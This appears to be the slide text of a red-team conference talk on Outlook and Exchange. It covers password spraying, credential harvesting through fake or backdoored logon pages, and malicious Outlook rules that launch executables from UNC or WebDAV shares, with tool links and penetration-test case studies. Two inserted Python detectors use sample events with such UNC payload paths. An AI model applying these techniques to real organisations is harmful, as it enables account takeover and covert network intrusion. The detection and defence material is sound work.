Outlook and Exchange for the bad guys

Outlook & Exchange for the Bad Guys
It's always fun breaking the rules
Nick Landers / @monoxgas / Silent Break Security

> getuid
Nick Landers (@monoxgas)
Security Consultant at Silent Break Security
Salt Lake City, Utah, US
Hacking for 8 years, 2 professionally
My Loves:
- Writing Windows malware (slingshot/throwback)
- Coding with C++, Python, or PowerShell
- Security research for the red side
- Long walks on the beach


Tonight's Agenda
- Exchange Overview
- Recon
- Credential Harvesting
- Outlook Rules
- Exploitation Details
- Demo!
- Questions


Currently supported versions: 2007, 2010, 2013, 2016; Office 365 / Outlook.com
Remote Access Protocols:
- Exchange Web Services (EWS): SOAP over HTTP
- Outlook Anywhere: RPC over HTTP
- MAPI over HTTP (Exchange 2013+)
- Exchange ActiveSync (EAS): HTTP/XML, high latency / low bandwidth
Functions:
- AutoDiscover: fast collection of Exchange configurations, supported protocols, and service URLs
- Outlook Web App (OWA): minimal e-mail client available via the web, e.g. http://mail.org.com/owa
- Global Address List (GAL): LDAP/Active Directory


Recon
Goal: collect e-mails, usernames, and (maybe) passwords from public resources
Sources:
- Search engines (Google, Bing, etc.)
- Company websites: DNS brute-forcing to discover subdomains
- Public websites (LinkedIn, GitHub)
- Database dumps (leakedsource, haveibeenpwned)
- Active Directory: for lateral movement and segmentation bypassing
Tooling:
- Discover - https://github.com/leebaird/discover (Lee Baird)
  Passive: ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng
  Active: nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute, and Whatweb
- FOCA - https://www.elevenpaths.com/labstools/foca/index.html
- LinkedIn Scraper - https://github.com/wpentester/Linkedin_profiles (Hans Petrich)
- HackerTarget - https://hackertarget.com/ip-tools/


Collecting Credentials
Brute Forcing Techniques:
- OWA: Black Hills Security password spraying w/ Burp - http://www.blackhillsinfosec.com/?p=4694
- EWS: ShellIntel PowerShell Toolkit - https://github.com/Shellntel/OWA-Toolkit
- NTLM HTTP Auth: Python Requests - https://github.com/requests/requests-ntlm
Use a targeted e-mail list with common passwords (Summer2016, Password1, etc.)
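The spraying pattern described on this slide (one common password tried across a targeted user list) has a distinctive shape in the mail server's authentication logs: many distinct accounts from one source with few attempts per account. The following detector is an added example, not tooling from the talk; its log lines are constructed and their field layout (time, source IP, account, result) is an assumed format, not real OWA/IIS output.

```python
"""Password-spray detection over constructed web-mail auth log lines.
Added example, not from the talk; the field layout (time, source IP,
account, result) is an assumption, not a real OWA/IIS log format."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2016-08-01T09:00:01 198.51.100.7 alice@example.com FAIL
2016-08-01T09:00:02 198.51.100.7 bob@example.com FAIL
2016-08-01T09:00:03 198.51.100.7 carol@example.com FAIL
2016-08-01T09:00:04 198.51.100.7 dave@example.com FAIL
2016-08-01T09:00:05 198.51.100.7 erin@example.com SUCCESS
2016-08-01T09:03:10 203.0.113.9 alice@example.com FAIL
2016-08-01T09:03:20 203.0.113.9 alice@example.com FAIL
2016-08-01T09:03:30 203.0.113.9 alice@example.com SUCCESS
"""

def parse_log(text):
    """Parse constructed lines into (time, ip, user, result) tuples."""
    events = []
    for line in filter(None, text.splitlines()):
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user.lower(), result))
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {ip: sorted users} for sources that touched at least
    min_users distinct accounts inside one sliding window. A spray tries
    one password across many users, so the distinct-user count climbs
    while per-user attempts stay low; a single-user brute force of the
    same size never trips this check."""
    by_ip = defaultdict(list)
    for ts, ip, user, _ in events:
        by_ip[ip].append((ts, user))
    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

def compromised_during_spray(events, hits):
    """Accounts with a SUCCESS from a spraying source: reset these first."""
    return sorted({u for _, ip, u, r in events if ip in hits and r == "SUCCESS"})
```

Tune `window` and `min_users` to the tenant's normal login volume; the second source in the sample (one account, repeated attempts) is deliberately left alone so a lockout policy, not this rule, handles it.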


Collecting Credentials pt. 2
Credential Harvesting Attacks via E-Mail:
- Impersonate target company logon page (OWA, Office 365, etc.)
- No payload to burn + blend with the spam = attacks can be scaled up (5-10 vs 100-200 targets)
External Site Compromise (WordPress, LiveAgent, etc.):
- No longer useless for gaining internal network access!
- Credential re-use is VERY common
- Backdoor logon pages with JavaScript to steal credentials
- Grab passwords from databases
Social Engineering

Outlook Rules Overview
"A rule is an action that Outlook for Windows runs automatically on incoming or outgoing messages. You choose what triggers the rule as well as the actions the rule takes." - Microsoft
Rules can be created:
- Server side (OWA, Outlook.com)
- Client side (Outlook)
- Often not compatible due to subtle differences in the usage of rule properties
Rule action order:
- Server side actions (move mail to folder)
- Client side actions (print a message)
Rules are stored with the Exchange server. Any new Outlook instance receives all existing rules.
When a client side action is needed, a deferred action message (DAM) is sent to the client with the rule ID.


Rule Actions
That looks promising!

Peeking Inside

A Deeper Look

ShellExecuteEx
lpVerb: The set of available verbs depends on the particular file or folder. Generally, the actions available from an object's shortcut menu are available verbs. This parameter can be NULL, in which case the default verb is used if available. If not, the "open" verb is used. Can be viewed/modified in HKEY_CLASSES_ROOT.
lpFile: The address of a null-terminated string that specifies the name of the file or object on which ShellExecuteEx will perform the action specified by the lpVerb parameter.
lpParameters: Optional. The address of a null-terminated string that contains the application parameters.

Exploitation Challenges
- Requires valid account credentials along with Exchange service access
  Recon & brute forcing; RPC/MAPI over HTTP
- No command line arguments
- Need a local file on disk for Outlook to open
  UNC to the rescue! (\\Server\Share\evil.exe)
  Local SMB share (Kali Linux, existing Windows share): internal pentesting/pivoting/persistence
  WebDAV share: accessible via UNC path, HTTP with proxy awareness
- A file type which can give us code execution with ShellExecute: BAT, EXE, PIF, VBS, JS, HTA, LNK, etc.
- Target needs Outlook open to receive the DAM and execute the attack

Use Cases
Initial access to a target network:
- Relatively easy to collect e-mail credentials externally
- Pivot to workstation without local admin privileges
- Bypass network segmentation
Persistence:
- Stealthy: obscure technique with minimal tooling available for detection/monitoring
- Long-term: linked to e-mail profile, not workstation; persistence across a DFIR wipe
- Drop an executable onto an internal file share
- Load rule into many e-mail accounts, trigger with one e-mail

State of Things
- Rulz.py: build malicious RWZ files for importing into Outlook (monoxgas) - https://gist.github.com/monoxgas/7fec9ec0f3ab405773fc
- Ruler: MAPI over HTTP to quickly sync rule file without building a complete profile (SensePost) - https://github.com/sensepost/ruler
- XRulez: use local Outlook profiles to import malicious rule for persistence (MWR Labs) - https://github.com/mwrlabs/XRulez


Demo!
Pop a shell with e-mail!

Case Study #1
Black-box penetration test for an organization
- Discovered 0-day in externally hosted LiveAgent software for support chat
- Compromised SQL database and used tokens to log in to the web interface
- Placed custom HTML on the footer of the logon page to steal user credentials
- Password re-use to get into an e-mail account
- Outlook attack to pivot into the environment
- Lateral movement and privilege escalation to Domain Admin

Case Study #2
Black-box penetration test for an organization
- Credential brute-forcing to find weak user login
- Outlook attack to gain initial access to the network
- Security team discovered the compromise, changed user password, wiped workstation
- Used previously synced rule with external e-mail to gain access to the network AGAIN
- Lateral movement and privilege escalation to get Domain Admin

Phishing payloads are DEAD! Long live the Outlook Attack!

What Now?
Future Research:
- Abuse mso.dll/Outlook to avoid argument limitations with ShellExecute
- Modify Ruler by SensePost to include support for MAPI over RPC over HTTP (2007/2010)
- Build pass-the-hash support into tooling so NTLM hashes can be used to pivot internally
- Use named pipes as a file replacement for in-memory pivoting
- Backdoor/patch mso.dll on disk for Outlook persistence without modifying server-side profile
Defenses:
- Disable WebDAV outbound at the firewall
- Monitor process creation from Outlook and/or app whitelisting
- Monitor Exchange logs for rule sync events from outside of the network?
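The "monitor process creation from Outlook" defence is concrete enough to write down: the rule action ends in ShellExecuteEx, so the telltale is OUTLOOK.EXE as the parent of a process whose image or arguments point at a UNC path (SMB or WebDAV) or at one of the file types listed under Exploitation Challenges. The classifier below is an added example, not part of the talk; its events are constructed in Sysmon Event ID 1 style (not real log output), and the list of children Outlook is expected to spawn is an assumption to tune per environment.

```python
"""Flag suspicious child processes of Outlook in process-creation telemetry.
Added example for the "monitor process creation from Outlook" defence; the
events are constructed in Sysmon Event ID 1 style (not real log output) and
the expected-children allow-list is an assumption to tune per environment."""
import ntpath
import re
import shlex

# File types the talk lists as giving code execution through ShellExecute.
RISKY_EXT = {".bat", ".exe", ".pif", ".vbs", ".js", ".hta", ".lnk"}
# Children Outlook legitimately spawns (assumption; tune per environment).
EXPECTED_CHILDREN = {"winword.exe", "excel.exe", "ucmapi.exe"}
# UNC prefix such as \\server\share\ (a WebDAV share reached via UNC matches too).
UNC_RE = re.compile(r"\\\\[\w.-]+\\")
OUTLOOK = r"C:\Program Files\Microsoft Office\Office16\OUTLOOK.EXE"

CONSTRUCTED_EVENTS = [
    {"ParentImage": OUTLOOK, "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n'},
    {"ParentImage": OUTLOOK, "Image": r"\\203.0.113.5\share\evil.exe",
     "CommandLine": r"\\203.0.113.5\share\evil.exe"},
    {"ParentImage": OUTLOOK, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "\\203.0.113.5\DavWWWRoot\r.vbs"'},
    {"ParentImage": OUTLOOK, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\u\AppData\Local\Temp\note.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def classify(event):
    """Return None for benign events, else a (severity, reason) tuple."""
    if ntpath.basename(event["ParentImage"]).lower() != "outlook.exe":
        return None
    if ntpath.basename(event["Image"]).lower() in EXPECTED_CHILDREN:
        return None
    cmd = event.get("CommandLine", "")
    if UNC_RE.search(event["Image"]) or UNC_RE.search(cmd):
        return ("high", "Outlook launched a file from a UNC path")
    args = [t.strip('"') for t in shlex.split(cmd, posix=False)[1:]]
    if any(ntpath.splitext(a)[1].lower() in RISKY_EXT for a in args):
        return ("medium", "Outlook started a host with a runnable file argument")
    return ("low", "unexpected child process of Outlook")

def scan(events):
    """Return [(index, severity, reason)] for every event worth alerting on."""
    return [(i, *v) for i, e in enumerate(events) if (v := classify(e))]
```

Pair the high-severity hits with the firewall rule above: a UNC launch from Outlook that reaches an external host is exactly the outbound WebDAV traffic the defence is meant to block.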


Questions?
Nick Landers - @monoxgas
Silent Break Security
[email protected]